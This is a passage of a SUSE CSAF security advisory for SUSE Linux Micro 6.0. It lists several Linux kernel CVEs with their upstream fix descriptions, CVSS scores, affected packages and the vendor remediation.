0000000080050033\n [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n [177.742][T2585409] PKRU: 55555554\n [177.748][T2585409] Call Trace:\n [177.753][T2585409] \u003cTASK\u003e\n [177.759][T2585409] ? __die_body.cold+0x19/0x27\n [177.766][T2585409] ? die+0x2e/0x50\n [177.772][T2585409] ? do_trap+0x1ea/0x2d0\n [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.788][T2585409] ? do_error_trap+0xa3/0x160\n [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.805][T2585409] ? handle_invalid_op+0x2c/0x40\n [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.820][T2585409] ? exc_invalid_op+0x2d/0x40\n [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20\n [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-42103",
"url": "https://www.suse.com/security/cve/CVE-2024-42103"
},
{
"category": "external",
"summary": "SUSE Bug 1228490 for CVE-2024-42103",
"url": "https://bugzilla.suse.com/1228490"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2024-42103"
},
{
"cve": "CVE-2024-53070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: fix fault at system suspend if device was already runtime suspended\n\nIf the device was already runtime suspended then during system suspend\nwe cannot access the device registers else it will crash.\n\nAlso we cannot access any registers after dwc3_core_exit() on some\nplatforms so move the dwc3_enable_susphy() call to the top.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53070",
"url": "https://www.suse.com/security/cve/CVE-2024-53070"
},
{
"category": "external",
"summary": "SUSE Bug 1233563 for CVE-2024-53070",
"url": "https://bugzilla.suse.com/1233563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2024-53070"
},
{
"cve": "CVE-2024-53149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: glink: fix off-by-one in connector_status\n\nUCSI connector\u0027s indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS.\nCorrect the condition in the pmic_glink_ucsi_connector_status()\ncallback, fixing Type-C orientation reporting for the third USB-C\nconnector.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53149",
"url": "https://www.suse.com/security/cve/CVE-2024-53149"
},
{
"category": "external",
"summary": "SUSE Bug 1234842 for CVE-2024-53149",
"url": "https://bugzilla.suse.com/1234842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2024-53149"
},
{
"cve": "CVE-2025-22047",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22047"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value\n\nWhen verify_sha256_digest() fails, __apply_microcode_amd() should propagate\nthe failure by returning false (and not -1 which is promoted to true).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22047",
"url": "https://www.suse.com/security/cve/CVE-2025-22047"
},
{
"category": "external",
"summary": "SUSE Bug 1241437 for CVE-2025-22047",
"url": "https://bugzilla.suse.com/1241437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-22047"
},
{
"cve": "CVE-2025-37813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Fix invalid pointer dereference in Etron workaround\n\nThis check is performed before prepare_transfer() and prepare_ring(), so\nenqueue can already point at the final link TRB of a segment. And indeed\nit will, some 0.4% of times this code is called.\n\nThen enqueue + 1 is an invalid pointer. It will crash the kernel right\naway or load some junk which may look like a link TRB and cause the real\nlink TRB to be replaced with a NOOP. This wouldn\u0027t end well.\n\nUse a functionally equivalent test which doesn\u0027t dereference the pointer\nand always gives correct result.\n\nSomething has crashed my machine twice in recent days while playing with\nan Etron HC, and a control transfer stress test ran for confirmation has\njust crashed it again. The same test passes with this patch applied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37813",
"url": "https://www.suse.com/security/cve/CVE-2025-37813"
},
{
"category": "external",
"summary": "SUSE Bug 1242909 for CVE-2025-37813",
"url": "https://bugzilla.suse.com/1242909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-37813"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38321",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38321"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: Log an error when close_all_cached_dirs fails\n\nUnder low-memory conditions, close_all_cached_dirs() can\u0027t move the\ndentries to a separate list to dput() them once the locks are dropped.\nThis will result in a \"Dentry still in use\" error, so add an error\nmessage that makes it clear this is what happened:\n\n[ 495.281119] CIFS: VFS: \\\\otters.example.com\\share Out of memory while dropping dentries\n[ 495.281595] ------------[ cut here ]------------\n[ 495.281887] BUG: Dentry ffff888115531138{i=78,n=/} still in use (2) [unmount of cifs cifs]\n[ 495.282391] WARNING: CPU: 1 PID: 2329 at fs/dcache.c:1536 umount_check+0xc8/0xf0\n\nAlso, bail out of looping through all tcons as soon as a single\nallocation fails, since we\u0027re already in trouble, and kmalloc() attempts\nfor subseqeuent tcons are likely to fail just like the first one did.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38321",
"url": "https://www.suse.com/security/cve/CVE-2025-38321"
},
{
"category": "external",
"summary": "SUSE Bug 1246328 for CVE-2025-38321",
"url": "https://bugzilla.suse.com/1246328"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
